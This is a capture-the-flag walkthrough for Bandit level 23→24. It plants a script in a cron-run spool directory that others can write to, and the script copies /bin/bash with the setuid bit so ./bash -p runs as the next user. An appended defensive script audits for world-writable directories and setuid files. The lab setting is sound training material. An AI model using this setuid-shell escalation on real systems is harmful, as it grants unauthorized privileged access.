Bandit Level 23 → Level 24

cat /etc/cron.d/cronjob_bandit24

If we read it:

cat /usr/bin/cronjob_bandit24.sh

So it will execute all scripts in the /var/spool/bandit24/foo directory every minute, and then delete everything. So let's write a simple bash script that will copy the /bin/bash binary to another file and give it the setuid bit, and we will place it in the /tmp/Caesar3 directory:

mkdir /tmp/Caesar3
cd /tmp/Caesar3
vim script.sh

:wq
cat script.sh
#!/usr/bin/bash

cp /bin/bash /tmp/Caesar3/bash; chmod u+s /tmp/Caesar3/bash
chmod +x script.sh
cp script.sh /var/spool/bandit24/foo/
ls /var/spool/bandit24/foo/script.sh

We also give everyone permission to write in the directory we just created:

chmod 777 /tmp/Caesar3

As we can see, here is the bash binary, and we can execute it as the user bandit24:

./bash -p

Here is the password for the next user.

Note: Check for the script, for instance every 30 seconds; if it was deleted, just copy it again and wait.
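
The two conditions this level relies on can be checked for directly: a directory that a scheduled job runs files from while other accounts can write to it, and a setuid file appearing in scratch space. The following is an added example, not part of the original walkthrough; the function names are hypothetical and the demo directories are constructed in a temporary location, where on a real host you would pass paths such as /var/spool/bandit24/foo and /tmp.

```shell
#!/bin/sh
# Added example (not from the original page): audit helpers for the two
# conditions seen in this level. Function names are hypothetical.

# Print the directory if its "other" write bit is set.
world_writable_dir() {
    find "$1" -maxdepth 0 -type d -perm -0002 2>/dev/null
}

# Print regular files below a directory that carry the setuid bit.
setuid_files_in() {
    find "$1" -xdev -type f -perm -4000 2>/dev/null
}

# Report both findings; return 1 if anything was flagged, 0 otherwise.
audit() {
    audit_rc=0
    if [ -n "$(world_writable_dir "$1")" ]; then
        echo "WARN: $1 is world-writable, so a job that runs files from it runs any user's code"
        audit_rc=1
    fi
    audit_hits=$(setuid_files_in "$2")
    if [ -n "$audit_hits" ]; then
        printf 'WARN: setuid file(s) under %s:\n%s\n' "$2" "$audit_hits"
        audit_rc=1
    fi
    return "$audit_rc"
}

# Constructed demo: stand-ins for the spool and scratch directories, built in
# a temporary location so nothing on the host is touched.
demo=$(mktemp -d)
mkdir "$demo/spool" "$demo/scratch"
chmod 777 "$demo/spool"
: > "$demo/scratch/copy"          # empty placeholder file, not a real shell
chmod 4755 "$demo/scratch/copy"   # setuid bit set, as chmod u+s would do
audit "$demo/spool" "$demo/scratch" || echo "audit flagged the constructed directories"
rm -rf "$demo"
```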
